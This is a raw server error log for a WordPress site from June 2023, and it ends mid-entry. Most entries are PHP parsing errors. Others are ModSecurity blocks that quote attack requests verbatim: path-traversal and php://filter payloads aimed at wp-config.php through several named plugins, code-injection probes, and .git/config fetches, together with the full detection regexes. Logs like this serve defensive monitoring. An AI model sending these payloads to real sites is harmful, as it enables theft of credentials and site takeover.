DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Jun 21 21:30:14.933577 2023] [autoindex:error] [pid 9066:tid 140490846459648] [client 38.55.75.203:56138] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Jun 22 12:12:04.191007 2023] [:error] [pid 9437:tid 140438344808192] [client 161.35.166.125:47986] ParsingException in IniFile.cpp:198: Malformed line "[global]\r" [Thu Jun 22 12:12:04.191078 2023] [core:error] [pid 9437:tid 140438344808192] [client 161.35.166.125:47986] End of script output before headers: xmlrpc.php [Thu Jun 22 12:34:19.644445 2023] [:error] [pid 14042:tid 140623688439552] [client 31.210.39.123:48762] ParsingException in IniFile.cpp:198: Malformed line "[global]\r" [Thu Jun 22 12:34:19.644521 2023] [core:error] [pid 14042:tid 140623688439552] [client 31.210.39.123:48762] End of script output before headers: xmlrpc.php [Thu Jun 22 12:35:58.682859 2023] [:error] [pid 14042:tid 140623924057856] [client 152.207.110.49:48800] ParsingException in IniFile.cpp:198: Malformed line "[global]\r", referer: https://www.google.com/ [Thu Jun 22 12:35:58.682930 2023] [core:error] [pid 14042:tid 140623924057856] [client 152.207.110.49:48800] End of script output before headers: index.php, referer: https://www.google.com/ [Thu Jun 22 12:35:59.337168 2023] [:error] [pid 14042:tid 140623932450560] [client 152.207.110.49:48802] ParsingException in IniFile.cpp:198: Malformed line "[global]\r", referer: https://investigacionperu.com/ [Thu Jun 22 12:35:59.337249 2023] [core:error] [pid 14042:tid 140623932450560] [client 152.207.110.49:48802] End of script output before headers: index.php, referer: https://investigacionperu.com/ [Thu Jun 22 12:36:24.005249 2023] [:error] [pid 13856:tid 140623763973888] [client 152.207.110.49:48814] ParsingException in IniFile.cpp:198: Malformed line "[global]\r", referer: https://www.google.com/ [Thu Jun 22 12:36:24.005332 2023] [core:error] [pid 13856:tid 140623763973888] [client 152.207.110.49:48814] End of script output before headers: index.php, referer: https://www.google.com/ [Thu Jun 22 12:36:24.336437 2023] [:error] [pid 13856:tid 140623730403072] [client 152.207.110.49:48816] ParsingException in IniFile.cpp:198: Malformed line "[global]\r", referer: https://investigacionperu.com/ [Thu Jun 22 12:36:24.336489 2023] [core:error] [pid 13856:tid 140623730403072] [client 152.207.110.49:48816] End of script output before headers: index.php, referer: https://investigacionperu.com/ [Thu Jun 22 12:49:06.337044 2023] [:error] [pid 16561:tid 140185204291328] [client 208.109.24.33:49308] ParsingException in IniFile.cpp:198: Malformed line "[global]\r" [Thu Jun 22 12:49:06.337113 2023] [core:error] [pid 16561:tid 140185204291328] [client 208.109.24.33:49308] End of script output before headers: xmlrpc.php [Thu Jun 22 12:52:11.478010 2023] [:error] [pid 1184:tid 139789474969344] [client 144.208.74.212:59228] ParsingException in IniFile.cpp:198: Malformed line "[global]\r" [Thu Jun 22 12:52:11.478068 2023] [core:error] [pid 1184:tid 139789474969344] [client 144.208.74.212:59228] End of script output before headers: xmlrpc.php [Thu Jun 22 13:00:14.659591 2023] [:error] [pid 3012:tid 139789483362048] [client 184.168.106.3:59432] ParsingException in IniFile.cpp:198: Malformed line "[global]\r" [Thu Jun 22 13:00:14.659661 2023] [core:error] [pid 3012:tid 139789483362048] [client 184.168.106.3:59432] End of script output before headers: xmlrpc.php [Thu Jun 22 13:15:48.506643 2023] [:error] [pid 5179:tid 140098436175616] [client 190.92.159.48:59998] ParsingException in IniFile.cpp:198: Malformed line "[global]\r" [Thu Jun 22 13:15:48.506703 2023] [core:error] [pid 5179:tid 140098436175616] [client 190.92.159.48:59998] End of script output before headers: xmlrpc.php [Thu Jun 22 13:22:16.770768 2023] [:error] [pid 5179:tid 140098444568320] [client 179.43.190.234:60306] ParsingException in IniFile.cpp:198: Malformed line "[global]\r" [Thu Jun 22 13:22:16.770850 2023] [core:error] [pid 5179:tid 140098444568320] [client 179.43.190.234:60306] End of script output before headers: wp-login.php [Thu Jun 22 13:26:25.846094 2023] [:error] [pid 6607:tid 140098293176064] [client 141.94.247.170:60402] ParsingException in IniFile.cpp:198: Malformed line "[global]\r" [Thu Jun 22 13:26:25.846154 2023] [core:error] [pid 6607:tid 140098293176064] [client 141.94.247.170:60402] End of script output before headers: wp-login.php [Thu Jun 22 13:36:02.673871 2023] [:error] [pid 5177:tid 140098318354176] [client 14.225.23.106:60666] ParsingException in IniFile.cpp:198: Malformed line "[global]\r" [Thu Jun 22 13:36:02.673934 2023] [core:error] [pid 5177:tid 140098318354176] [client 14.225.23.106:60666] End of script output before headers: xmlrpc.php [Thu Jun 22 14:10:41.958354 2023] [:error] [pid 5179:tid 140098217641728] [client 193.201.8.40:33312] [client 193.201.8.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/background-image-cropper/wp_wrong_datlib.php"] [unique_id "ZJScsZWXzMw9aFjz4PcaegAAAJU"] [Thu Jun 22 14:17:39.301417 2023] [:error] [pid 6607:tid 140098226034432] [client 178.18.244.0:33470] ParsingException in IniFile.cpp:198: Malformed line "[global]\r" [Thu Jun 22 14:17:39.301490 2023] [core:error] [pid 6607:tid 140098226034432] [client 178.18.244.0:33470] End of script output before headers: xmlrpc.php [Thu Jun 22 14:23:02.914721 2023] [:error] [pid 23048:tid 139831946487552] [client 152.32.189.117:33824] ParsingException in IniFile.cpp:198: Malformed line "[global]\r" [Thu Jun 22 14:23:02.914778 2023] [core:error] [pid 23048:tid 139831946487552] [client 152.32.189.117:33824] End of script output before headers: wp-login.php [Thu Jun 22 14:25:29.907811 2023] [:error] [pid 23048:tid 139831921309440] [client 66.249.66.33:33878] ParsingException in IniFile.cpp:198: Malformed line "[global]\r" [Thu Jun 22 14:25:29.907872 2023] [core:error] [pid 23048:tid 139831921309440] [client 66.249.66.33:33878] End of script output before headers: index.php [Thu Jun 22 14:33:45.430132 2023] [:error] [pid 23048:tid 139831988451072] [client 62.116.133.86:34132] ParsingException in IniFile.cpp:198: Malformed line "[global]\r" [Thu Jun 22 14:33:45.430182 2023] [core:error] [pid 23048:tid 139831988451072] [client 62.116.133.86:34132] End of script output before headers: xmlrpc.php [Thu Jun 22 14:48:17.930152 2023] [:error] [pid 28901:tid 140395803522816] [client 81.31.158.19:34524] ParsingException in IniFile.cpp:198: Malformed line "[global]\r" [Thu Jun 22 14:48:17.930208 2023] [core:error] [pid 28901:tid 140395803522816] [client 81.31.158.19:34524] End of script output before headers: wp-login.php [Thu Jun 22 14:48:40.222572 2023] [:error] [pid 28901:tid 140395736381184] [client 66.249.66.164:34546] ParsingException in IniFile.cpp:198: Malformed line "[global]\r" [Thu Jun 22 14:48:40.222631 2023] [core:error] [pid 28901:tid 140395736381184] [client 66.249.66.164:34546] End of script output before headers: index.php [Thu Jun 22 14:58:17.176606 2023] [:error] [pid 28901:tid 140395820308224] [client 212.48.69.24:34784] ParsingException in IniFile.cpp:198: Malformed line "[global]\r" [Thu Jun 22 14:58:17.176665 2023] [core:error] [pid 28901:tid 140395820308224] [client 212.48.69.24:34784] End of script output before headers: xmlrpc.php [Thu Jun 22 15:16:45.476945 2023] [:error] [pid 28383:tid 140395820308224] [client 102.182.29.132:35406] ParsingException in IniFile.cpp:198: Malformed line "[global]\r" [Thu Jun 22 15:16:45.477007 2023] [core:error] [pid 28383:tid 140395820308224] [client 102.182.29.132:35406] End of script output before headers: index.php [Thu Jun 22 15:19:35.172572 2023] [:error] [pid 28383:tid 140395879057152] [client 35.233.164.145:35464] ParsingException in IniFile.cpp:198: Malformed line "[global]\r" [Thu Jun 22 15:19:35.172633 2023] [core:error] [pid 28383:tid 140395879057152] [client 35.233.164.145:35464] End of script output before headers: wp-login.php [Thu Jun 22 15:20:08.455894 2023] [:error] [pid 28901:tid 140395982530304] [client 66.249.66.165:35474] ParsingException in IniFile.cpp:198: Malformed line "[global]\r" [Thu Jun 22 15:20:08.455953 2023] [core:error] [pid 28901:tid 140395982530304] [client 66.249.66.165:35474] End of script output before headers: index.php [Thu Jun 22 15:41:50.464838 2023] [:error] [pid 12613:tid 139932173559552] [client 23.88.24.92:36528] ParsingException in IniFile.cpp:198: Malformed line "[global]\r" [Thu Jun 22 15:41:50.464893 2023] [core:error] [pid 12613:tid 139932173559552] [client 23.88.24.92:36528] End of script output before headers: xmlrpc.php [Thu Jun 22 15:53:54.305792 2023] [:error] [pid 14120:tid 140509569799936] [client 149.62.185.142:36874] ParsingException in IniFile.cpp:198: Malformed line "[global]\r" [Thu Jun 22 15:53:54.305859 2023] [core:error] [pid 14120:tid 140509569799936] [client 149.62.185.142:36874] End of script output before headers: wp-login.php [Thu Jun 22 16:15:17.921146 2023] [:error] [pid 22439:tid 139726712182528] [client 106.0.49.122:37548] ParsingException in IniFile.cpp:198: Malformed line "[global]\r" [Thu Jun 22 16:15:17.921226 2023] [core:error] [pid 22439:tid 139726712182528] [client 106.0.49.122:37548] End of script output before headers: wp-login.php [Thu Jun 22 16:23:24.376274 2023] [:error] [pid 24125:tid 139726720575232] [client 143.244.145.56:37798] ParsingException in IniFile.cpp:198: Malformed line "[global]\r" [Thu Jun 22 16:23:24.376332 2023] [core:error] [pid 24125:tid 139726720575232] [client 143.244.145.56:37798] End of script output before headers: xmlrpc.php [Thu Jun 22 16:28:31.563061 2023] [:error] [pid 24125:tid 139726568785664] [client 178.57.218.124:37924] ParsingException in IniFile.cpp:198: Malformed line "[global]\r" [Thu Jun 22 16:28:31.563122 2023] [core:error] [pid 24125:tid 139726568785664] [client 178.57.218.124:37924] End of script output before headers: index.php [Thu Jun 22 16:56:23.426398 2023] [:error] [pid 22439:tid 139726627534592] [client 66.249.66.163:38532] ParsingException in IniFile.cpp:198: Malformed line "[global]\r" [Thu Jun 22 16:56:23.426475 2023] [core:error] [pid 22439:tid 139726627534592] [client 66.249.66.163:38532] End of script output before headers: index.php [Thu Jun 22 17:08:23.214670 2023] [:error] [pid 24125:tid 139726568785664] [client 51.254.91.39:38876] ParsingException in IniFile.cpp:198: Malformed line "[global]\r" [Thu Jun 22 17:08:23.214725 2023] [core:error] [pid 24125:tid 139726568785664] [client 51.254.91.39:38876] End of script output before headers: xmlrpc.php [Thu Jun 22 17:11:04.358353 2023] [:error] [pid 24125:tid 139726476465920] [client 66.94.96.129:38928] ParsingException in IniFile.cpp:198: Malformed line "[global]\r" [Thu Jun 22 17:11:04.358407 2023] [core:error] [pid 24125:tid 139726476465920] [client 66.94.96.129:38928] End of script output before headers: wp-login.php [Thu Jun 22 17:24:41.957575 2023] [:error] [pid 24125:tid 139726602356480] [client 205.210.31.43:39228] ParsingException in IniFile.cpp:198: Malformed line "[global]\r" [Thu Jun 22 17:24:41.957631 2023] [core:error] [pid 24125:tid 139726602356480] [client 205.210.31.43:39228] End of script output before headers: index.php 2023/06/22 22:26:24 [error] 31656#31656: *10920 access forbidden by rule, client: 185.220.101.3, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/06/22 22:26:27 [error] 31656#31656: *10924 access forbidden by rule, client: 192.42.116.208, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Fri Jun 23 03:34:54.931436 2023] [autoindex:error] [pid 20348:tid 140076759590656] [client 41.216.188.92:44236] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Fri Jun 23 14:20:49.278316 2023] [:error] [pid 24505:tid 140683348186880] [client 193.201.8.40:33788] [client 193.201.8.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/background-image-cropper/image/ico/s_ne.php"] [unique_id "ZJXwkQM55H3ErGqSvClaeQAAANc"] [Sun Jun 25 02:51:33.780040 2023] [autoindex:error] [pid 19553:tid 140642126624512] [client 165.140.84.85:46448] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Jun 25 14:12:26.714312 2023] [:error] [pid 24795:tid 140255904458496] [client 23.128.248.23:40492] [client 23.128.248.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "ZJiRmvMRudKiOmssFP6IEAAAAIA"] [Sun Jun 25 14:12:27.337005 2023] [:error] [pid 6294:tid 140255663429376] [client 23.128.248.23:40494] [client 23.128.248.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=php://filter/read=convert.base64-encode/resource=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "ZJiRm9jYcHyO0P41DG2aVwAAAVQ"] [Sun Jun 25 14:12:28.034110 2023] [:error] [pid 6294:tid 140255638251264] [client 23.128.248.23:40496] [client 23.128.248.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZJiRnNjYcHyO0P41DG2aWAAAAVc"] [Sun Jun 25 14:12:28.787570 2023] [:error] [pid 24992:tid 140255713785600] [client 23.128.248.23:40498] [client 23.128.248.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=php://filter/read=convert.base64-encode/resource=../../../../wp-config.php&file_size=10"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZJiRnNki1nVtQtQNGjpG8gAAAM4"] [Sun Jun 25 14:12:29.805977 2023] [:error] [pid 24992:tid 140255722178304] [client 23.155.24.2:40500] [client 23.155.24.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/advanced-uploader/upload.php?destinations=../../../../../../../../../wp-config.php%00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/advanced-uploader/upload.php"] [unique_id "ZJiRndki1nVtQtQNGjpG8wAAAM0"] [Sun Jun 25 14:12:30.687794 2023] [:error] [pid 24795:tid 140255896065792] [client 23.155.24.2:40502] [client 23.155.24.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/advanced-uploader/upload.php?destinations=php://filter/read=convert.base64-encode/resource=../../../../../../../../../wp-config.php%00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/advanced-uploader/upload.php"] [unique_id "ZJiRnvMRudKiOmssFP6IEQAAAIE"] [Sun Jun 25 14:12:31.530459 2023] [:error] [pid 24795:tid 140255738963712] [client 23.155.24.2:40504] [client 23.155.24.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php"] [unique_id "ZJiRn_MRudKiOmssFP6IEgAAAIs"] [Sun Jun 25 14:12:32.353094 2023] [:error] [pid 24795:tid 140255713785600] [client 23.155.24.2:40506] [client 23.155.24.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=php://filter/read=convert.base64-encode/resource=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php"] [unique_id "ZJiRoPMRudKiOmssFP6IEwAAAI4"] [Sun Jun 25 14:12:34.511516 2023] [:error] [pid 6294:tid 140255688607488] [client 23.155.24.2:40512] [client 23.155.24.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php"] [unique_id "ZJiRotjYcHyO0P41DG2aWQAAAVE"] [Sun Jun 25 14:12:35.514281 2023] [:error] [pid 6294:tid 140255629858560] [client 23.155.24.2:40514] [client 23.155.24.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=php://filter/read=convert.base64-encode/resource=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php"] [unique_id "ZJiRo9jYcHyO0P41DG2aWgAAAVg"] [Sun Jun 25 14:12:36.290271 2023] [:error] [pid 6294:tid 140255722178304] [client 23.155.24.2:40516] [client 23.155.24.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri 